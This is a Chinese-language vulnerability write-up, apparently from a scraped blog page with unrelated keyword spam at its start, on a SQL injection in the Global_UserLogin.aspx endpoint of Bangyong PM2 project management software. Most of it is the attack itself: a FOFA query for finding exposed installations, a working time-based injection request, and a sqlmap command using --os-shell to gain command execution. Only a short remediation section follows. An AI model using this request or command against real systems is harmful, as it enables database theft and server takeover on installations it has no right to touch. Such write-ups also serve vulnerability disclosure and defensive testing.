网站建设徐州,设计资源网站大推荐,怎么做推广让别人主动加我,网站开发课程建议0x01 产品简介 邦永PM2项目管理系统科学地将项目管理思想和方法和谐、统一#xff0c;使得长期以来困扰项目管理工作者的工期、进度、投资和成本情况无法整体动态管理的问题得到了全面而彻底的解决。 0x02 漏洞概述 邦永科技PM2项目管理平台Global_UserLogin.aspx接口处未对用…0x01 产品简介 邦永PM2项目管理系统科学地将项目管理思想和方法和谐、统一使得长期以来困扰项目管理工作者的工期、进度、投资和成本情况无法整体动态管理的问题得到了全面而彻底的解决。 0x02 漏洞概述 邦永科技PM2项目管理平台Global_UserLogin.aspx接口处未对用户传入的参数未进行有效的过滤直接拼接至SQL查询的语句中导致SQL注入漏洞攻击者可利用该漏洞获取数据库的敏感信息深入利用可造成服务器失陷。 0x03 复现环境 FOFAbodyPM2项目管理系统BS版增强工具.zip 0x04 漏洞复现  PoC GET /Global/Global_UserLogin.aspx?accId1%27%3BWAITFORDELAY%270%3A0%3A5%27--loginCodepasswordtype HTTP/1.1 Host: your-ip Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 延时5秒 Sqlmap利用 python3 sqlmap.py -u http://your-ip/Global/Global_UserLogin.aspx?accId1*loginCodepasswordtype --os-shell 命令执行  0x05 修复建议  关闭互联网暴露面或接口设置外部访问权限 升级至安全版本